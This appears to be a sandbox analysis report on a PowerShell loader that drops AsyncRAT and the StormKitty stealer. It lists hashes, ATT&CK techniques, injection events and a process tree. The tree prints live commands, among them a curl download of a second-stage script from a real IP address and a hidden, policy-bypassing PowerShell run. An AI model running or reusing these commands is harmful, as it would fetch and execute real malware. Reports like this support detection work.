asyncrat | 569775b523c853aa351d5832df2fdbb68fdaa8c05f9cc67289921f00a66c0157

General

Target

trwsfg.ps1
Size

1KB
MD5

22bae550672a11587c37ebb8dabeefef
SHA1

5c7951317700fd35bbfd39499473889c752f9164
SHA256

569775b523c853aa351d5832df2fdbb68fdaa8c05f9cc67289921f00a66c0157
SHA512

03f9028156f1ba8f4ee62537ddba10c7f7d5ab0cee8cac17c1ae43c0c57922ed8a70d03b780142708afcae9b4eb46bb9b275e8b746061620681a57a27674e92a

Score

10^/10

asyncrat stormkitty discovery execution rat stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/4976-50-0x0000000000400000-0x0000000000704000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	4576	powershell.exe
14	1644	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4576	powershell.exe
1644	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1644 set thread context of 4976	1644	powershell.exe	91

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4576	powershell.exe
4576	powershell.exe
4576	powershell.exe
4576	powershell.exe
1644	powershell.exe
1644	powershell.exe
1644	powershell.exe
1644	powershell.exe
4976	RegAsm.exe
4976	RegAsm.exe
4976	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	4976	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4976	RegAsm.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 4576 wrote to memory of 3036	4576	powershell.exe	84
PID 4576 wrote to memory of 3036	4576	powershell.exe	84
PID 3036 wrote to memory of 1484	3036	cmd.exe	85
PID 3036 wrote to memory of 1484	3036	cmd.exe	85
PID 3036 wrote to memory of 1644	3036	cmd.exe	86
PID 3036 wrote to memory of 1644	3036	cmd.exe	86
PID 1484 wrote to memory of 3584	1484	cmd.exe	87
PID 1484 wrote to memory of 3584	1484	cmd.exe	87
PID 1644 wrote to memory of 2480	1644	powershell.exe	88
PID 1644 wrote to memory of 2480	1644	powershell.exe	88
PID 2480 wrote to memory of 1652	2480	csc.exe	89
PID 2480 wrote to memory of 1652	2480	csc.exe	89
PID 1644 wrote to memory of 2304	1644	powershell.exe	90
PID 1644 wrote to memory of 2304	1644	powershell.exe	90
PID 1644 wrote to memory of 2304	1644	powershell.exe	90
PID 1644 wrote to memory of 4976	1644	powershell.exe	91
PID 1644 wrote to memory of 4976	1644	powershell.exe	91
PID 1644 wrote to memory of 4976	1644	powershell.exe	91
PID 1644 wrote to memory of 4976	1644	powershell.exe	91
PID 1644 wrote to memory of 4976	1644	powershell.exe	91
PID 1644 wrote to memory of 4976	1644	powershell.exe	91
PID 1644 wrote to memory of 4976	1644	powershell.exe	91
PID 1644 wrote to memory of 4976	1644	powershell.exe	91

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trwsfg.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3036
- - C:\Windows\system32\cmd.exe
    cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1484
  - - C:\Windows\system32\curl.exe
      curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
      4⤵
      PID:3584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4hlesdte\4hlesdte.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2480
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72A0.tmp" "c:\Users\Admin\AppData\Local\Temp\4hlesdte\CSC6E29BBC36604C72AA6074A4297E12BC.TMP"
        5⤵
        
        PID:1652
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Temp\4hlesdte\4hlesdte.dll

Filesize
9KB

MD5
fb926004d3fd333d6d8f45b65ee186d0

SHA1
0a33dde1a34fa70acb9c1c15c9282297211d0fb2

SHA256
b8ed12db87e34f59e836f09502f44dc91dfadd84cea2198e89007ce4638fc9ef

SHA512
a0f72a6157a997489ed5df170bd75d413d78f382c08a00de2b0c60950f9dfa1ff07e0bf499e1f36e0e67d62dc32b018cdfd459c7d9e1c4013ce38098249ec3f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES72A0.tmp

Filesize
1KB

MD5
107bc83f7667d6ed52a2880aacaf92bd

SHA1
a8e03da9cbafa9ae29a0f9a80a5a98917805fb43

SHA256
563ddfe252e132ad409d816ff18bd6ba24e299b1ae14f3b942493234b88ec6fb

SHA512
a885b72bd1728410806623d35d164536e5b15b765e19a61a640895713aa9fce695cf3f7eda8fb8d916ebd2ba86274b3a667730841f1088a9bbc46aff6959924a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgw2zoar.xuc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Temp\Modules.bat

Filesize
3KB

MD5
bb445d197063475c8d78de4f0825753c

SHA1
158a8e3b278affe7c1185aad67683e4253cf53dd

SHA256
7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10

SHA512
173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4hlesdte\4hlesdte.0.cs

Filesize
10KB

MD5
b5c3a2d03ff4c721192716f326c77dea

SHA1
6b754fd988ca58865674b711aba76d3c6b2c5693

SHA256
ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac

SHA512
d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4hlesdte\4hlesdte.cmdline

Filesize
204B

MD5
416fc7dfafb26e12f64f8a473d49246d

SHA1
1cefa5cf43628c3bd3392a0c6910edb1563f9fcf

SHA256
43e2507c74bd6ed1beeda91e5c0ea710389c092d7785e0e5a774c245cc63cabe

SHA512
413b6af8267fb02e17d65e56b47c75053bdc4c2456d27b9a71107a2eca8cfe1da79b00a5be682d2c39272b3506d4df4320f375017a5e9675de6453b89818f9a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4hlesdte\CSC6E29BBC36604C72AA6074A4297E12BC.TMP

Filesize
652B

MD5
d2aecb074398be8a9fac2853bd6eaa69

SHA1
65033c4e7d1a71f0966c14f09b91e1c4c8938a7b

SHA256
2695b29deb21110d0905553bab3dd9982ccb947305c29c0d84e71b10792bbd78

SHA512
8b1c0c0c84dbacbe6e2f2d770bfb485209b3d5d07e72cc95117d01d24f2c124437d8aefdb190dd6fd79e3a9b41930bd23858860887f2e209b0a8ef18a2dc007e

Download Submit
memory/1644-20-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-47-0x0000022BC2120000-0x0000022BC2128000-memory.dmp

Filesize
32KB

Download
memory/1644-22-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-32-0x0000022BC2130000-0x0000022BC2174000-memory.dmp

Filesize
272KB

Download
memory/1644-33-0x0000022BC2550000-0x0000022BC25C6000-memory.dmp

Filesize
472KB

Download
memory/1644-34-0x0000022BC2110000-0x0000022BC2120000-memory.dmp

Filesize
64KB

Download
memory/1644-52-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-49-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-21-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

Filesize
10.8MB

Download
memory/4576-6-0x000001F7D3410000-0x000001F7D3432000-memory.dmp

Filesize
136KB

Download
memory/4576-11-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

Filesize
10.8MB

Download
memory/4576-12-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

Filesize
10.8MB

Download
memory/4576-0-0x00007FFC27F23000-0x00007FFC27F25000-memory.dmp

Filesize
8KB

Download
memory/4576-19-0x00007FFC27F20000-0x00007FFC289E1000-memory.dmp

Filesize
10.8MB

Download
memory/4976-50-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/4976-53-0x0000000005230000-0x00000000057D4000-memory.dmp

Filesize
5.6MB

Download
memory/4976-54-0x0000000005020000-0x00000000050B2000-memory.dmp

Filesize
584KB

Download
memory/4976-55-0x0000000004FC0000-0x0000000004FCA000-memory.dmp

Filesize
40KB

Download
memory/4976-58-0x0000000006040000-0x00000000060DC000-memory.dmp

Filesize
624KB

Download
memory/4976-59-0x00000000060E0000-0x0000000006146000-memory.dmp

Filesize
408KB

Download
memory/4976-60-0x0000000006490000-0x00000000064B2000-memory.dmp

Filesize
136KB

Download
memory/4976-61-0x00000000064C0000-0x0000000006814000-memory.dmp

Filesize
3.3MB

Download

Analysis

Sharing